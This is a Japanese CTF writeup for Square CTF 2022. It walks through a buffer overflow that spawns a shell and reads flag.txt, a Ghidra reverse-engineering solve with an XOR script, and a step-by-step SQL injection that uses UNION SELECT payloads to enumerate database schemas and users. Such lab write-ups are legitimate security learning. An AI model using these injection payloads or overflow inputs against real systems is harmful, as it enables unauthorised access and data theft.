この大会は2022/11/19 10:00(JST)~2022/11/20 10:10(JST)に開催されました。
今回もチームで参戦。結果は201点で593チーム中182位でした。
自分で解けた問題をWriteupとして書いておきます。
Pulse Check (pulse-check 1)
問題にフラグが書いてあった。
flag{im_alive_and_so_are_the_servers}
EZ pwn 1 (ez-pwn 50)
BOFで任意の8バイトの後に"/bin/sh"を入力すればよい。
$ nc chals.2022.squarectf.com 4100 Hi! would you like me to ls the current directory? AAAAAAAA/bin/sh Ok, here ya go! ls -l total 16 -r-xr-x--- 1 root pwnable_user 8528 Nov 6 21:09 ez-pwn-1 drwxr-xr-x 1 root pwnable_user 4096 Nov 9 04:49 the_flag_is_in_here ls -l the_flag_is_in_here total 4 -r--r----- 1 root pwnable_user 64 Nov 6 21:09 flag.txt cat the_flag_is_in_here/flag.txt flag{congrats_youve_exploited_a_memory_corruption_vulnerability}
flag{congrats_youve_exploited_a_memory_corruption_vulnerability}
EZ RE 1 (ez-re 100)
Ghidraでデコンパイルする。
undefined8 main(void) { int iVar1; char *__s2; long in_FS_OFFSET; undefined local_15 [5]; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); puts( "I\'ve got this encrypted blob, and a mysterious encrypt/decrypt function I was told its milit ary grade encryption so I don\'t think I can crack it. Would you happen to know the key?:" ); read(0,local_15,5); puts("Alright, lets try that out..."); __s2 = (char *)militaree_grayd_deekrypshun(local_15,flag_arr,5,0x3f); iVar1 = strncmp("flag{",__s2,5); if (iVar1 == 0) { puts("Hey, that looks right!"); puts(__s2); puts( "There was also this weird other encrypted blob, but its so big that I don\'t want to touch it. Feel free to decrypt it yourself though, i\'m pretty sure it uses the same key and algor ithm!\n" ); } else { puts("No, that doesn\'t look right."); } if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return 0; } void militaree_grayd_deekrypshun (undefined8 param_1,undefined8 param_2,undefined4 param_3,undefined4 param_4) { militaree_grayd_enkrypshun(param_1,param_2,param_3,param_4); return; } void * militaree_grayd_enkrypshun(long param_1,long param_2,int param_3,int param_4) { void *pvVar1; int local_18; int local_14; pvVar1 = malloc((long)param_4); for (local_18 = 0; local_18 < param_4; local_18 = local_18 + param_3) { for (local_14 = 0; (local_14 < param_3 && (param_4 != local_14 + local_18)); local_14 = local_14 + 1) { *(byte *)((long)pvVar1 + (long)(local_14 + local_18)) = *(byte *)(param_1 + local_14) ^ *(byte *)(param_2 + (local_14 + local_18)); } } return pvVar1; } flag_arr XREF[2]: Entry Point(*), main:001008b1(*) 00301020 0a 03 0d undefine 1f 1f 18 07 09 27 00301020 0a undefined10Ah [0] XREF[2]: Entry Point(*), main:001008b1(*) 00301021 03 undefined103h [1] 00301022 0d undefined10Dh [2] 00301023 1f undefined11Fh [3] 00301024 1f undefined11Fh [4] 00301025 18 undefined118h [5] 00301026 07 undefined107h [6] 00301027 09 undefined109h [7] 00301028 27 undefined127h [8] 00301029 02 undefined102h [9] 0030102a 19 undefined119h [10] 0030102b 01 undefined101h [11] 0030102c 0f undefined10Fh [12] 0030102d 0c undefined10Ch [13] 0030102e 0d undefined10Dh [14] 0030102f 03 undefined103h [15] 00301030 01 undefined101h [16] 00301031 33 undefined133h [17] 00301032 16 undefined116h [18] 00301033 05 undefined105h [19] 00301034 01 undefined101h [20] 00301035 0a undefined10Ah [21] 00301036 1f undefined11Fh [22] 00301037 27 undefined127h [23] 00301038 05 undefined105h [24] 00301039 1e undefined11Eh [25] 0030103a 0a undefined10Ah [26] 0030103b 33 undefined133h [27] 0030103c 19 undefined119h [28] 0030103d 3b undefined13Bh [29] 0030103e 0f undefined10Fh [30] 0030103f 00 undefined100h [31] 00301040 01 undefined101h [32] 00301041 15 undefined115h [33] 00301042 11 undefined111h [34] 00301043 18 undefined118h [35] 00301044 0e undefined10Eh [36] 00301045 18 undefined118h [37] 00301046 11 undefined111h [38] 00301047 12 undefined112h [39] 00301048 09 undefined109h [40] 00301049 30 undefined130h [41] 0030104a 1c undefined11Ch [42] 0030104b 0a undefined10Ah [43] 0030104c 0b undefined10Bh [44] 0030104d 1c undefined11Ch [45] 0030104e 0a undefined10Ah [46] 0030104f 1e undefined11Eh [47] 00301050 0c undefined10Ch [48] 00301051 1d undefined11Dh [49] 00301052 33 undefined133h [50] 00301053 05 undefined105h [51] 00301054 03 undefined103h [52] 00301055 13 undefined113h [53] 00301056 01 undefined101h [54] 00301057 33 undefined133h [55] 00301058 08 undefined108h [56] 00301059 09 undefined109h [57] 0030105a 0c undefined10Ch [58] 0030105b 3b undefined13Bh [59] 0030105c 05 undefined105h [60] 0030105d 1b undefined11Bh [61] 0030105e 11 undefined111h [62] 0030105f 00 ?? 00h
入力文字列とflag_arrのXORをした結果の最初の5文字が"flag{"になる入力文字列を指定すればよい。
#!/usr/bin/env python3 flag_arr = [0x0a, 0x03, 0x0d, 0x1f, 0x1f] flag = b'flag{' inp = '' for i in range(5): inp += chr(flag[i] ^ flag_arr[i]) print(inp)
実行結果は以下の通り。
lolxd
$ ./ez-re-1_elf I've got this encrypted blob, and a mysterious encrypt/decrypt function I was told its military grade encryption so I don't think I can crack it. Would you happen to know the key?: lolxd Alright, lets try that out... Hey, that looks right! flag{the_function_names_are_a_commutative_property_joke_get_it} There was also this weird other encrypted blob, but its so big that I don't want to touch it. Feel free to decrypt it yourself though, i'm pretty sure it uses the same key and algorithm!
flag{the_function_names_are_a_commutative_property_joke_get_it}
Alex Hanlon Has The Flag! (web 50)
SQLインジェクションを試す。いろいろとUsernameに入力していき、反応を見る。
・' or 1=1 # →Sorry, admin is the wrong user ・' union select 'alex' # →Sorry, alex is the wrong user ・' union select 'hanlon' # →Sorry, hanlon is the wrong user ・' union select schema_name from information_schema.schemata limit 0, 1 # →Sorry, information_schema is the wrong user ・' union select schema_name from information_schema.schemata limit 1, 1 # →Sorry, performance_schema is the wrong user ・' union select schema_name from information_schema.schemata limit 2, 1 # →Sorry, appdb is the wrong user ・' union select table_name from information_schema.tables where table_schema = 'appdb' limit 0, 1 # →Sorry, user is the wrong user ・' union select column_name from information_schema.columns where table_name = 'user' limit 0, 1 # →Sorry, password is the wrong user ・' union select column_name from information_schema.columns where table_name = 'user' limit 1, 1 # →Sorry, username is the wrong user ・' union select username from user limit 0, 1 # →Sorry, admin is the wrong user ・' union select username from user limit 1, 1 # →flag{470bbbc0519e4bc6987bb00bef24a97a}
flag{470bbbc0519e4bc6987bb00bef24a97a}